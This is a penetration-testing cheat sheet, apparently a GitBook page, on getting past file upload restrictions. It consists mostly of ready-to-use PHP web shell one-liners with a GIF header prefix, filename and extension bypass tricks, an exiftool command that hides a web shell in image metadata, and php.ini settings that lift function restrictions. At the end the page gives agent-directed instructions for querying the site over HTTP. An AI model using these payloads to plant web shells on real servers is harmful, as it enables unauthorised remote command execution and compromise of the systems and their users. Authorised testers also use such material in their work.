# File Upload bypass

## File Upload bypass

### Content

```php
GIF89a1
<?php $a=system($_GET['cmd']); echo $a;?>
<?php system('whoami'); ?>
<?php exec('whoami'); ?>
<?php passthru('whoami'); ?>
<?php shell_exec('whoami'); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
```

### Filters

```php
evil.png;.php
evil.gif.php
evil.gif.php5
evil.php;gif
evil.config
evil.htaccess

 --other-extensions--
php3
php4
php5
php7
pht
phtm
phtml
phar
phps
```

Other extensions

```php
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws
```

### Bypass file extensions checks

-Try upper cases: **pHp, .pHP5, .PhAr** ...\
-Add a valid extension before the execution extension: **file.png.Php5**\
-Add special characters at the end. Use burpsuite-intruder to make it easy.

```php
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
```

-Try to bypass the protections tricking the extension parser of the server-side with techniques like **doubling the extension** o**r adding junk data** (**null byte**s) between extensions.

```php
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
flile.phpJunk123png
```

### Metatag with exif tool

```php
exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.png
```

![](/files/-MXHgfOQxDwk5lX-HvuP)

### **php.ini file to bypass restrictions**

```php
safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
exec = ON 
shell_exec = ON
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook.seguranca-informatica.pt/cheat-sheet-1/web/file-upload-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.